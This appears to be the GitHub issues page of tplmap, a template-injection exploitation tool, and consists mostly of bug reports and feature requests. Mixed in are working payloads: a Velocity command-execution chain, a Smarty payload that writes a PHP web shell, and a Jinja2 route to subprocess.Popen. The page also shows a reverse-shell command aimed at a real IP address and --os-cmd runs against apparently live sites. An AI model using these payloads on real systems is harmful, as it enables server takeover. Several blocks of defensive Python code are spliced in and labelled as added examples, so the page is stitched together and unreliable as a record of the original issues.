epinna / tplmap
Server-Side Template Injection and Code Injection Detection and Exploitation Tool
License: GNU General Public License v3.0
All requirements are met too; when I add the Burp extension, the following error occurs:
How to use reverse-shell correctly
My error is:
sudo python ./tplmap.py -u '' -e velocity --level=5 --reverse-shell 82.246.225.33 8080
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'tag' is injectable
[+] Velocity plugin is testing rendering with tag '#set($c=)\n${c}\n'
[+] Velocity plugin is testing ) code context escape with 91 variations
[+] Velocity plugin is testing #end#if(1==1)* code context escape with 91 variations
[+] Velocity plugin is testing blind injection
[+] Velocity plugin is testing )* code context escape with 91 variations
[+] Velocity plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: tag
Engine: Velocity
Injection: a})*
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: yes (blind)
Bind and reverse shell: yes
File write: yes (blind)
File read: no
Code evaluation: no
[!][tplmap] Exiting: global name 'messages' is not defined
Traceback (most recent call last):
File "./tplmap.py", line 26, in <module>
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 299, in check_template_injection
tcpserver = TcpServer(int(port), timeout)
File "/opt/tplmap/tplmap/core/tcpserver.py", line 18, in __init__
self.connect_socket()
File "/opt/tplmap/tplmap/core/tcpserver.py", line 41, in connect_socket
log.error(messages.module_backdoor_reversetcp.error_binding_socket_s % str(e))
NameError: global name 'messages' is not defined
I do not understand; there are very few docs online.
The tplmap test environment is very useful for learning about SSTI vulnerabilities. Everyone can easily get the test environment by dockerizing it.
I already dockerized tplmap test environment. May I send it as a pull request?
Hey Emilio,
I'm a fan of weevely and this project also looks very promising.
I want to share a contribution to it. I thought about making a pull request but then I saw that I had to make lots of changes on the code, and I don't wanna ruin your work :)
This was the result of recent research I made on SSTI on Apache Velocity. The payloads on Portswigger's blog also didn't work for me so I set out to make my own research.
I ended up with this nice payload:
#set($run=$engine.getClass().forName("java.lang.Runtime"))#set($runtime=$run.getRuntime())#set($proc=$runtime.exec("COMMAND"))#set($null=$proc.waitFor())#set($istr=$proc.getInputStream())#set($chr=$engine.getClass().forName("java.lang.Character"))#set($output="")#set($string=$engine.getClass().forName("java.lang.String"))#foreach($i in [1..$istr.available()])#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))#end$output
It works like a charm for me. Please try it out and let me know if it works on your tests.
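Seen from the defending side, the payload quoted above has a recognisable shape: Velocity directives such as `#set(` combined with reflection calls (`getClass().forName`, `java.lang.Runtime`). The following Python detector is an added example, not part of the original post or of tplmap; the function names, verdict labels and log lines are constructed for illustration, and the marker list is an assumption drawn only from that payload.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Velocity directive openers, with or without the formal #{name} braces.
DIRECTIVE = re.compile(
    r"#\{?(?:set|foreach|if|evaluate|parse|include)\}?\s*\(", re.I)
# Reflection markers seen in the payload quoted in the post.
REFLECTION = re.compile(
    r"getClass\s*\(|forName\s*\(|getRuntime\s*\(|\.exec\s*\("
    r"|java\.lang\.(?:Runtime|ProcessBuilder)", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding, bounded so input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def verdict(value):
    """Classify one parameter value as 'alert', 'review' or 'clean'."""
    text = fully_decode(value)
    has_directive = bool(DIRECTIVE.search(text))
    has_reflection = bool(REFLECTION.search(text))
    if has_directive and has_reflection:
        return "alert"    # template directive plus Java reflection
    if has_directive or has_reflection:
        return "review"   # one marker only: worth a human look
    return "clean"


def scan_log(lines):
    """Return (line_number, parameter, verdict) for every suspicious value."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            result = verdict(value)
            if result != "clean":
                findings.append((number, name, result))
    return findings


def _entry(query):
    # Constructed log line; the address is from a documentation range.
    return ('198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] '
            '"GET /view?' + query + ' HTTP/1.1" 200 512')


# Constructed sample input: the first directive of the payload above,
# encoded once and twice, next to benign and borderline requests.
FRAGMENT = '#set($run=$engine.getClass().forName("java.lang.Runtime"))'
SAMPLE_LOG = [
    _entry("tag=shoes"),
    _entry("tag=" + quote(FRAGMENT, safe="")),
    _entry("tag=" + quote(quote(FRAGMENT, safe=""), safe="")),
    _entry("note=" + quote("#set($x=1)", safe="")),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A match here only says the request carried template syntax; whether the application rendered it still has to be checked against the application's own logs.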
When I tried to run tplmap, the following exception was raised.
$ ./tplmap.py -u 'https://www.target.com/app/?id=*'
[+] Tplmap 0.1
Automatic Server-Side Template Injection Detection and Exploitation Tool
[!][tplmap] Exiting: 'list' object has no attribute 'split'
Traceback (most recent call last):
File "./tplmap.py", line 26, in <module>
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/Users/pengfei/Projects/github/tplmap/core/channel.py", line 29, in __init__
self._parse_header()
File "/Users/pengfei/Projects/github/tplmap/core/channel.py", line 46, in _parse_header
for param_value in self.args.get('headers').split('\\r\\n'):
AttributeError: 'list' object has no attribute 'split'
It seems to be caused by the default option of headers being an empty list.
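The traceback above fails because `.split()` is called on a value that may be a list. The following Python helper is an added example, not tplmap's code or its eventual fix; `normalize_headers` is a hypothetical name. It accepts `None`, a list of `Name: value` strings, or one string joined by the literal two-character sequences `\r\n` (as in the `'\\r\\n'` of the traceback), and rejects entries with embedded CR/LF.

```python
import re

# Header field names must be RFC 7230 tokens.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# Literal backslash-r-backslash-n, the separator used in the traceback.
ESCAPED_CRLF = "\\r\\n"


def normalize_headers(raw):
    """Return a {name: value} dict from None, a list, or a joined string."""
    if raw is None:
        entries = []
    elif isinstance(raw, str):
        entries = raw.split(ESCAPED_CRLF)
    elif isinstance(raw, (list, tuple)):
        entries = []
        for item in raw:
            if not isinstance(item, str):
                raise TypeError("header entries must be strings")
            entries.extend(item.split(ESCAPED_CRLF))
    else:
        raise TypeError("headers must be None, a string or a list")

    headers = {}
    for entry in entries:
        if not entry.strip():
            continue  # tolerate empty segments such as a trailing separator
        name, sep, value = entry.partition(":")
        name, value = name.strip(), value.strip()
        if not sep or not TOKEN.fullmatch(name):
            raise ValueError("malformed header: %r" % entry)
        # Embedded CR or LF would let one option smuggle extra header lines.
        if "\r" in value or "\n" in value:
            raise ValueError("CR/LF inside header value: %r" % entry)
        headers[name] = value
    return headers


if __name__ == "__main__":
    print(normalize_headers([]))  # the default that triggered the error
    print(normalize_headers(["X-Trace: 1", "Cookie: a=b; c=d"]))
    print(normalize_headers("X-Trace: 1\\r\\nAccept: */*"))
```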
When I start the tool, it outputs this error.
Command
$ python tplmap.py -u http://127.0.0.1:5000/?u=test
Error
[!][tplmap] Exiting: 'module' object has no attribute 'disable_warnings'
My OS : Kali Linux
Already installed modules.
Lz1y say ~/OneDrive/tools/web/Burp suite/jython/bin $ ./jython -m pip freeze
certifi==2019.6.16
chardet==3.0.4
idna==2.8
PyYAML==5.1.2
requests==2.22.0
urllib3==1.25.3
Error log:
Traceback (most recent call last):
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension.py", line 1, in <module>
from burp_extension.burp_extender import BurpExtender
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/burp_extender.py", line 2, in <module>
from config_tab import ConfigTab
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/config_tab.py", line 6, in <module>
from core.checks import plugins
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/checks.py", line 20, in <module>
from core.channel import Channel
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/channel.py", line 1, in <module>
import requests
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/__init__.py", line 115, in <module>
from .api import request, get, head, post, patch, put, delete, options
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/api.py", line 13, in <module>
from . import sessions
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/sessions.py", line 27, in <module>
from .adapters import HTTPAdapter
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/adapters.py", line 44, in <module>
from urllib3.contrib.socks import SOCKSProxyManager
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/adapters.py", line 44, in <module>
from urllib3.contrib.socks import SOCKSProxyManager
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/urllib3/contrib/socks.py", line 40, in <module>
import socks
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/urllib3/contrib/socks.py", line 40, in <module>
import socks
File "/Users/ziyiliu/Library/Python/2.7/lib/python/site-packages/socks.py", line 267, in <module>
class _BaseSocket(socket.socket):
TypeError: Error when calling the metaclass bases
function() argument 1 must be code, not str
PR #41 solves the jinja2 false negative, but it clovers the nunjucks test because nunjucks and jinja2 use the same syntax.
If I change test_render like below
'test_render': '%(n1)s' % {
'n1' : '[].__class__.__mro__[1].__subclasses__()'
},
the html source of response is
So, I changed test_render_expected like below
'test_render_expected': '%(res)s' % {
'res' : 'jinja2.environment.Template'
}
But it does not work.
How to solve it?
This templating engine usually found in ASP.NET can be exploited too.
There are a few pointers in an article I wrote.
Unfortunately I did not have the time yet to implement it in tplmap, so I drop it here for reference.
Hey pro,
I am a bug bounty hunter.
The Burp extension does not work.
Up to date (git pull).
Trace:
Traceback (most recent call last):
File "/opt/tplmap/tplmap/burp_extension.py", line 9, in <module>
from core.checks import plugins
File "/opt/tplmap/tplmap/core/checks.py", line 1, in <module>
from plugins.engines.mako import Mako
File "/opt/tplmap/tplmap/plugins/engines/mako.py", line 1, in <module>
from plugins.languages import python
File "/opt/tplmap/tplmap/plugins/languages/python.py", line 2, in <module>
from core.plugin import Plugin
File "/opt/tplmap/tplmap/core/plugin.py", line 3, in <module>
from utils.loggers import log
File "/opt/tplmap/tplmap/utils/loggers.py", line 4, in <module>
import utils.config
File "/opt/tplmap/tplmap/utils/config.py", line 3, in <module>
import yaml
ImportError: No module named yaml
at org.python.core.imp.importFrom(imp.java:1132)
at plugins.engines.mako$py.f$0(/opt/tplmap/tplmap/plugins/engines/mako.py:6)
at plugins.engines.mako$py.call_function(/opt/tplmap/tplmap/plugins/engines/mako.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at core.checks$py.f$0(/opt/tplmap/tplmap/core/checks.py:141)
at core.checks$py.call_function(/opt/tplmap/tplmap/core/checks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at org.python.pycode._pyx5.f$0(/opt/tplmap/tplmap/burp_extension.py:313)
at org.python.pycode._pyx5.call_function(/opt/tplmap/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1386)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:286)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at burp.id.<init>(Unknown Source)
at burp.emc.a(Unknown Source)
at burp.qg.run(Unknown Source)
at java.lang.Thread.run(Thread.java:745)
Payload: {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME, "<?php passthru($_GET['cmd']);?>", self::clearConfig())}
Source: https://gist.github.com/aancw/492581f5faed962993c71cf233d52942
By default, even if there is a successful injection, the output is stderr
tplmap -u http://127.0.0.1:8080/page?name=lol 2>/dev/null (nothing)
tplmap -u http://127.0.0.1:8080/page?name=lol 2>&1 (success)
can you fix it please, thanks!
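An added example (not tplmap's code) of the behaviour reported above: a `logging.StreamHandler` created without a stream argument writes to `sys.stderr`, so `2>/dev/null` discards everything it emits. It assumes the tool logs through Python's standard `logging` module; the logger name, format and messages are constructed for illustration.

```python
import io
import logging
import sys


class MaxLevelFilter(logging.Filter):
    """Let through only records at or below max_level."""

    def __init__(self, max_level):
        super().__init__()
        self.max_level = max_level

    def filter(self, record):
        return record.levelno <= self.max_level


def default_handler_uses_stderr():
    # With no stream argument the handler binds to sys.stderr, which is
    # why redirecting fd 2 to /dev/null hides every log line.
    return logging.StreamHandler().stream is sys.stderr


def build_split_logger(name, out=None, err=None):
    """Send DEBUG/INFO (findings, progress) to stdout, WARNING+ to stderr."""
    out = sys.stdout if out is None else out
    err = sys.stderr if err is None else err

    logger = logging.getLogger(name)
    logger.handlers[:] = []          # start clean if called twice
    logger.setLevel(logging.DEBUG)
    logger.propagate = False         # do not duplicate into the root logger

    fmt = logging.Formatter("[%(levelname)s] %(message)s")

    results = logging.StreamHandler(out)
    results.setLevel(logging.DEBUG)
    results.addFilter(MaxLevelFilter(logging.INFO))
    results.setFormatter(fmt)

    problems = logging.StreamHandler(err)
    problems.setLevel(logging.WARNING)
    problems.setFormatter(fmt)

    logger.addHandler(results)
    logger.addHandler(problems)
    return logger


def demo():
    # In-memory streams stand in for the two file descriptors.
    out, err = io.StringIO(), io.StringIO()
    log = build_split_logger("scanner-demo", out, err)
    log.info("identified injection point: GET parameter 'name'")  # constructed
    log.warning("target returned HTTP 500")                       # constructed
    return out.getvalue(), err.getvalue()


if __name__ == "__main__":
    print(default_handler_uses_stderr())
    print(demo())
```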
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this gives visibility to your tool and improves its referencing.
The badge shows your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that, but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
Hi,
Are you able to add proxy support for the tool at all?
Have a vulnerable server using Jinja2 incorrectly. tplmap says that "no system command execution capabilities have been detected on the target."
But I can inject {{ [].__class__.__bases__[-1].__subclasses__()[79] }} to reach <class 'subprocess.Popen'>, and surely something can be done with that ...
running the command below I got the error below, please how do I go about resolving this
./tplmap.py -u 'http://X.X.X.X/login?next='
Traceback (most recent call last):
File "./tplmap.py", line 3, in <module>
from core import checks
File "/home/kali/tplmap/core/checks.py", line 1, in <module>
from plugins.engines.mako import Mako
File "/home/kali/tplmap/plugins/engines/mako.py", line 1, in <module>
from plugins.languages import python
File "/home/kali/tplmap/plugins/languages/python.py", line 2, in <module>
from core.plugin import Plugin
File "/home/kali/tplmap/core/plugin.py", line 3, in <module>
from utils.loggers import log
File "/home/kali/tplmap/utils/loggers.py", line 4, in <module>
import utils.config
File "/home/kali/tplmap/utils/config.py", line 3, in <module>
import yaml
ImportError: No module named yaml
Any idea on this ?!
How do I continue to pwn the target or at least to confirm that the vuln is not false positive?!
root@kaLi:~/Desktop/scripts/tplmap# python tplmap.py -u 'https://www.target.com/category/movie*' --level 5 --os-cmd 'pwd' -e mako
[+] Tplmap 0.4
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if URL parameter 'url' is injectable
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block>*<%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
URL parameter: url
Engine: Mako
Injection: </%def>*<%def name="t(x)">
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: no
Bind and reverse shell: no
File write: no
File read: no
Code evaluation: ok, python code (blind)
[-][checks] No system command execution capabilities have been detected on the target.
Hey, maybe it would be necessary to add a test for each algorithm, for those who need it and do not want to test everything themselves :)
Tplmap detects the following.
Shell command execution: ok (blind)
Bind and reverse shell: ok
File write: ok (blind)
File read: no
Code evaluation: ok, php code (blind)
and I used the --os-shell switch and it resulted in something like this.
(blind) $ whoami
False
(blind) $ ping example.com
False
I don't know why it gives False as output.
Please help me with this issue.
After being given the option to rerun to gain shell access, it reports that the parameters are not injectable
Apparently there is a bug when using python3:
Traceback (most recent call last):
File "tplmap.py", line 2, in <module>
from utils import cliparser
File "/usr/share/tplmap/utils/cliparser.py", line 163, in <module>
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))
TypeError: method expected 2 arguments, got 3
This is similar to #4 but it sounds like python3 is finally supported: #33
Would it be possible to add some compat code so this works with python3?
I couldn't find any option that could help running an authenticated test using tplmap. Just like sqlmap provides --cookie argument which can be used to set the session cookies and run the authenticated scan, similarly there should be an option in tplmap that can be used to provide the session cookie values.
Alternatively, there should also be an option to parse the file into tplmap (just like -r and -l works in sqlmap), which can allow tplmap to parse the post request with session cookies.
Similarly to sqlmap, a wildcard could be used to indicate injection points that aren't standard GET parameters.
how to check multiple targets/urls using tplmap
Is it possible to add support for the JSON content type?
For example, sending a POST request which contains parameters in JSON format.
Got the results below but it doesn't give any options to rerun.
Is there a way to take some advantage from that?
[+] Tplmap 0.4
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'fromURI' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing }*{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1}* code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Smarty plugin is testing blind injection
[+] Smarty plugin is testing }*{ code context escape with 65 variations
[+] Smarty plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: fromURI
Engine: Smarty
Injection: 1))}*{
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: no
Bind and reverse shell: no
File write: no
File read: no
Code evaluation: ok, php code (blind)
[+] Rerun tplmap providing one of the following options:
root@zion:~/tplmap#
I was reading this article: apparently it's possible to get command execution on old versions of Twig, but tplmap doesn't support it.
Shall I issue a PR to support this? Would you consider it for inclusion?
A feature similar to the --random-agent switch in sqlmap would be another nice thing to have. Be it where the entire "session" uses one randomly chosen user-agent, or where on a per-request basis one is chosen.
How do I use the blind OS shell?
There is very little documentation online.
I do not understand how it works.
Hello admin,
I am a whitehat member of a bug bounty website.
I systematically encounter the same error when I use the scanner with the option --level=5; in any case, on this website with the option --level=5 there is a fatal error every time.
The install is up to date, from scratch.
/opt/tplmap/tplmap$ sudo python ./tplmap.py -u "https://www.xxxx.de/axxxe/?JSESSIONID=$%7b144*5%7d" --level=5
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'JSESSIONID' is injectable
[+] Smarty plugin is testing rendering with tag '{}'
[+] Smarty plugin is testing }{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1}* code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Smarty plugin is testing blind injection
[+] Smarty plugin is testing }{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1} code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Mako plugin is testing rendering with tag '${}'
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %><%# code context escape with 130 variations
[+] Mako plugin is testing #\n\n code context escape with 130 variations
[+] Mako plugin is testing </%def><%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block><%block> code context escape with 130 variations
[+] Mako plugin is testing </%text><%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %><%# code context escape with 130 variations
[+] Mako plugin is testing #\n\n code context escape with 130 variations
[+] Mako plugin is testing </%def><%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block><%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[!][tplmap] Exiting: ('Connection aborted.', BadStatusLine("''",))
Traceback (most recent call last):
File "./tplmap.py", line 26, in <module>
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 135, in check_template_injection
current_plugin = detect_template_injection(channel)
File "/opt/tplmap/tplmap/core/checks.py", line 126, in detect_template_injection
current_plugin.detect()
File "/opt/tplmap/tplmap/core/plugin.py", line 100, in detect
self._detect_blind()
File "/opt/tplmap/tplmap/core/plugin.py", line 226, in _detect_blind
blind = True
File "/opt/tplmap/tplmap/core/plugin.py", line 610, in evaluate_blind
blind=True
File "/opt/tplmap/tplmap/core/plugin.py", line 546, in evaluate
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 363, in render
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 304, in inject
self.channel.req(injection)
File "/opt/tplmap/tplmap/core/channel.py", line 285, in req
verify = False
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 473, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))
fakessh@fakessh:/opt/tplmap/tplmap$
Line 144 in cliparser:
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_,parser, type(parser))
TypeError: method expected 2 arguments, got 3
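An added example (not tplmap's code) for the `TypeError: method expected 2 arguments, got 3` reported in the two cliparser posts above: on Python 3, `type(bound_method)` is `types.MethodType`, which takes only a function and an instance. The parser, its options, the length cap and the `shortened` helper are constructed for illustration.

```python
import optparse
import types

MAX_HELP_OPTION_LENGTH = 18  # assumed cap, chosen for this example


def legacy_bind_raises():
    """Reproduce the three-argument call from the traceback on Python 3."""
    formatter = optparse.OptionParser().formatter
    bound = formatter.format_option_strings
    try:
        # Python 2 form: (function, instance, class)
        type(bound)(lambda self, opt: "", formatter, type(formatter))
    except TypeError:
        return True
    return False


def build_parser():
    parser = optparse.OptionParser(prog="demo")
    parser.add_option("--a-very-long-option-name", dest="x",
                      help="constructed option")
    parser.add_option("-u", "--url", dest="url", help="target URL")

    formatter = parser.formatter
    original = formatter.format_option_strings  # keep the bound original

    def shortened(self, option):
        # Truncate over-long option strings so the help column stays aligned.
        text = original(option)
        if len(text) > MAX_HELP_OPTION_LENGTH:
            text = text[:MAX_HELP_OPTION_LENGTH - 2] + ".."
        return text

    # Two-argument form: required by Python 3, also accepted by Python 2.7.
    formatter.format_option_strings = types.MethodType(shortened, formatter)
    return parser


if __name__ == "__main__":
    print(legacy_bind_raises())
    print(build_parser().format_help())
```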
Hi, just want to know how to tamper with or modify the payload
The problem is the server will decrypt the request before it is executed
Example request (for base64)
tplmap.py -u 'http://domain.target/page?param1={{*}}'
So instead of {{*}}, the payload will become base64.b64encode("{{*}}"). Thanks!
Hi, can you help me please to fix this error
./bin/pip install PyYaml requests
Downloading/unpacking PyYaml
Downloading PyYAML-3.13.tar.gz (270kB): 270kB downloaded
Running setup.py (path:/private/var/folders/bw/396sl31x6pg3bbn9nn0p22x00000gn/T/pip_build_Pentest/PyYaml/setup.py) egg_info for package PyYaml
Cleaning up...
Exception:
Traceback (most recent call last):
File "/path/to/install/jython/Lib/site-packages/pip/basecommand.py", line 133, in main
status = self.run(options, args)
File "/path/to/install/jython/Lib/site-packages/pip/commands/install.py", line 316, in run
requirement_set.prepare_files(
File "/path/to/install/jython/Lib/site-packages/pip/commands/install.py", line 316, in run
requirement_set.prepare_files(
File "/path/to/install/jython/Lib/site-packages/pip/req/req_set.py", line 397, in prepare_files
req_to_install.assert_source_matches_version()
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 478, in assert_source_matches_version
version = self.installed_version
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 474, in installed_version
return self.pkg_info()['version']
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 442, in pkg_info
data = self.egg_info_data('PKG-INFO')
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 371, in egg_info_data
data = read_text_file(filename)
File "/path/to/install/jython/Lib/site-packages/pip/util.py", line 777, in read_text_file
encodings = ['utf-8', locale.getpreferredencoding(False), 'latin1']
File "/path/to/install/jython/Lib/locale.py", line 574, in getpreferredencoding
return getdefaultlocale()[1]
File "/path/to/install/jython/Lib/locale.py", line 511, in getdefaultlocale
return _parse_localename(localename)
File "/path/to/install/jython/Lib/locale.py", line 443, in _parse_localename
raise ValueError, 'unknown locale: %s' % localename
ValueError: unknown locale: UTF-8
Storing debug log for failure in /Users/test/.pip/pip.log
nothing works, 100% false positive, this works only in your mind, another crap to make people waste time, thanks for nothing
any idea on how to use the --tpl-shell ?
can u put any how to please?!
Hi guys,
I need some help setting this up on Win10 Burp. I followed the instructions provided.
wget https://repo1.maven.org/maven2/org/python/jython-installer/2.7.2/jython-installer-2.7.2.jar
mkdir jython
java -jar jython-installer-2.7.2.jar -s -d c:\temp\jython -t standard
cd jython
bin\pip install PyAml requests
I get this error:
Traceback (most recent call last):
File "C:\Temp\tplmap\burp_extension.py", line 1, in <module>
from burp_extension.burp_extender import BurpExtender
File "C:\Temp\tplmap\burp_extension\burp_extender.py", line 2, in <module>
from config_tab import ConfigTab
File "C:\Temp\tplmap\burp_extension\config_tab.py", line 6, in <module>
from core.checks import plugins
ImportError: No module named core
at org.python.core.Py.ImportError(Py.java:329)
at org.python.core.imp.import_first(imp.java:1230)
at org.python.core.imp.import_module_level(imp.java:1361)
at org.python.core.imp.importName(imp.java:1528)
at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at burp_extension.config_tab$py.f$0(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/config_tab.py:103)
at burp_extension.config_tab$py.call_function(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/config_tab.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:630)
at org.python.core.imp.createFromPyClass(imp.java:312)
at org.python.core.imp.createFromPyClass(imp.java:255)
at org.python.core.imp.loadFromSource(imp.java:929)
at org.python.core.imp.find_module(imp.java:769)
at org.python.core.PyModule.findSubModule(PyModule.java:140)
at org.python.core.PyModule.impAttr(PyModule.java:107)
at org.python.core.imp.import_next(imp.java:1161)
at org.python.core.imp.import_module_level(imp.java:1350)
at org.python.core.imp.importName(imp.java:1528)
